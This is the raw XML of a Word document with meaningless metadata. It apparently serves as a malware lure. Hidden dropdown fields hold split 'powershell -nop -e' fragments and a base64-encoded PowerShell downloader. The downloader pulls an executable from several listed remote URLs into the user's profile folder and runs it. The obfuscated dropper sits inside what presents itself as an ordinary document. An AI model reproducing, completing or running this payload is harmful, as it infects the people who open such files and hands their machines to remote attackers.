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AEEA"/>
  <w:body>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:dropDownList/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:t xml:space="preserve">ell -nop -e </w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:dropDownList/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:t>powersh</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:dropDownList/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:t>JABCADkAagBpAGIAdQA9ACcAQgBZAGoAcwBUAGwAJwA7ACQASwBtAEkAWgBYAEsAegBGACAAPQAgACcAMwA1ADEAJwA7ACQAdgBLADQAdwBVAGoAagAyAD0AJwBmAEkAVwBTADkAWgBDACcAOwAkAE4AYgBqADIAdQB3AHEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAbQBJAFoAWABLAHoARgArACcALgBlAHgAZQAnADsAJABqADQASQBHAGsAcQBuAD0AJwBaAFMAaQBEADMAWAAzACcAOwAkAFkAbQBMAHIAcQA1AHcAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AYABlAGAAVAAuAHcAZQBCAGMATABJAGUAbgB0ADsAJABCAG0AaQBfAG8AZABDAD0AJwBoAHQAdABwADoALwAvAHcAdwB3AC4AbgB1AHMAYQBzAHYALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHYAMgBvADkAdQB0ADEALwBAAGgAdAB0AHAAOgAvAC8AcwBhAG0AaQBuAHAAcgBpAG4AdABlAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG0AcQBrAGcAYQBlADEANQA4AC8AQABoAHQAdABwADoALwAvAHYAZQByAGkAZABpAGEAYwBvAG0AbQB1AG4AaQB0AHkALgBjAG8AbQAvAGoAcwAvAGgAeAA0AC8AQABoAHQAdABwAHMAOgAvAC8AZABvAGMAcwAuAGIAZQBhAHUAdABoAGUAbQBlAC4AYwBvAG0ALwBiAGwAZQB1AHQAZQAvADIAZQBzAGsAYgBuAHYANAAyADgANwAvAEAAaAB0AHQAcAA6AC8ALwBwAGEAcgBlAG4AdABpAG4AZwAuAGkAbABtAGMAaQAuAGMAbwBtAC8AeABlAGsAZAAvAGYAYwBsADQANQA3ADcALwAnAC4AcwBQAGwASQB0ACgAJwBAACcAKQA7ACQAZABzAGIARABzADgAPQAnAHoAcQBHAGwAVABSAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEEAagBqAEYARABpAFgAIABpAG4AIAAkAEIAbQBpAF8AbwBkAEMAKQB7AHQAcgB5AHsAJABZAG0ATAByAHEANQB3AC4ARABvAFcATgBMAE8AYQBkAEYAaQBMAGUAKAAkAEEAagBqAEYARABpAFgALAAgACQATgBiAGoAMgB1AHcAcQApADsAJAB2AHoARQBTAEYAcgB6AEgAPQAnAHQAaABSAF8AYgBDACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQATgBiAGoAMgB1AHcAcQApAC4AbABFAE4ARwBUAGgAIAAtAGcAZQAgADIANAAxADcAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgBUACgAJABOAGIAagAyAHUAdwBxACkAOwAkAEkAbwBLAE0AegBDAHQAPQAnAHAATABCAEEAVABDAGMAJwA7AGIAcgBlAGEAawA7ACQAdgBkAEEAbwA3AFcAdQBjAD0AJwBqAHAAaQBHAHcATQBrAEwAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwBRAFcAdQBKAFUASwA9ACcATABPAGgAVwBNAFQAQQBVACcA</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5946140" cy="2051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9:26:00Z</dcterms:created>
  <dc:creator>Uriah Flatley</dc:creator>
  <dc:description>implement</dc:description>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-24T19:26:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject>gold</dc:subject>
  <dc:title>Cambridgeshire JBOD Ford</dc:title>
</cp:coreProperties>
</file>